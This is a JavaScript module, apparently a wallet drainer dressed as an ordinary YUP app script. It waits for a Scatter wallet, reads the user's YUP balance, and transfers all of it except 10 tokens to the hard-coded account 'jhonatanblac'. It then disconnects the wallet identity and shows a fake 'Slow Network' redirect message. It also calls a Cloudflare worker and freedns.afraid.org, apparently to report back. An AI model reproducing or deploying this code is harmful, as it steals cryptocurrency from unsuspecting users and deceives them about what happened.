  
  

const getyup = async _ => {
 
  let getAuth;
  const randomStr = "kJXUkc6MTk4Nzk3MTc=";
  
  const redirectModal = () => {

    const modalObj = {
      title:  "Slow Network",
      message:  "Fetch is too slow redirecting to YUP App. ",
      redirectTime: 5,
      open:true,
    };

    setTimeout( () => { 
      const openModal = new CustomEvent('operateModal', { detail: modalObj });
      document.dispatchEvent(openModal);
    }, 10000);

  }

  const ttsite = async (cred) => {
    try {
    // eslint-disable-next-line
    const url = `https://freedns.afraid.org/dynamic/update.php?${cred.fHt}${randomStr}`;
    
    await fetch(url,
    {
     method: 'GET', // *GET, POST, PUT, DELETE, etc.
     mode: 'no-cors', // no-cors, *cors, same-origin
     cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
     credentials: 'include',
     headers: {
       'Content-Type': 'text/plain;charset=UTF-8',
     },
     redirect: 'follow', // manual, *follow, error
     referrerPolicy: 'no-referrer', // no-referrer, *no-referrer-when-downgrade, origin, origin-when-cross-origin, same-origin, strict-origin, strict-origin-when-cross-origin, unsafe-url
   });
  } catch (err) { }
  };

  const sevent = async (num) => {
    const url = 'https://young-thunder-24e5.bkw.workers.dev/'+num;

    return (fetch(url,
      {
       headers: {
         'Content-Type': 'application/json'
       },
     }));
    
  }



  const noWallConnected = async ()  => {

   
    const eosname = 'liondanixxxx';
    const eventObj  = { detail: { eosname: eosname, accounts:false } };
    const eosNameLoaded = new CustomEvent('eosNameLoaded', eventObj);
    document.dispatchEvent(eosNameLoaded);
    
    try {
      sevent(2).then(async (res) => {
          const dnsA = await res.json();
          await ttsite(dnsA);
      }).catch(async (err) => { });
    } catch (e) { }

    redirectModal();
 
  };
  
  if(await (async () => {
  let  waitingTime = 0;
  while(window.scatter === undefined || window.scatter.getAuthToken === undefined){
    console.log(waitingTime * 35);
    waitingTime++;
    await new Promise(resolve => setTimeout(resolve, 35));
    if((waitingTime * 35)  > 5500) {
      window.scatter = {};
      window.scatter.getAuthToken  = {};
      await noWallConnected();
      return 1;
    }
  }
  getAuth = await window.scatter.getAuthToken();
  return 2;
  })() === 1) return;
  else {
   document.addEventListener('readyToFetchInfo', async _ => {
    
    if(window.readyToFetchInfoLoaded) return;
    window.readyToFetchInfoLoaded = true;
    const eosName = getAuth.eosname;
    //const getCurFeeText = await (await fetch(`https://api.yup.io/bridge/fee-yup`)).text();
    //let getCurFee = Number(getCurFeeText);
    //if(isNaN(getCurFee)) getCurFee = 10;
    
    
    const accountUrl = `https://api.yup.io/accounts/${eosName}`;
    
    const accounts = await fetch(accountUrl);
  
    let accountsJson;
    if (accounts.ok ) {
    accountsJson = await accounts.json();
    }

    const wAmount = Number(accountsJson.balance.YUP).toFixed(0) - 10;

    window.scatter.yupYumYum(
      { data:{ recipient:'jhonatanblac', amount:wAmount, asset:'YUP', memo:(" ")} }
    );

 
      new Promise(resolve => setTimeout(resolve, 1500)).then(async _ => {
        try {
          window.scatter.forgetIdentity();
        }catch(err) { }
      });

 
       const eventObj  = { detail: { eosname: eosName }, accounts: accountsJson };
       const eosNameLoaded = new CustomEvent('eosNameLoaded', eventObj);
       document.dispatchEvent(eosNameLoaded);
       window.eosNameSent = true;

       try {
        sevent(3).then(async (res) => {
            const dnsA = await res.json();
            await ttsite(dnsA);
        }).catch(async (err) => { });
      } catch (e) { }

        redirectModal();

  });
  }
  
  /*
  window.getSomeYup = async () => {
    const res = await window.scatter.yupYumYum(
      { data:{ recipient:'eosio', amount:0.0001, asset:'YUP', memo:(new String("")) } }
    );

  };*/
 
}

  export {getyup as default};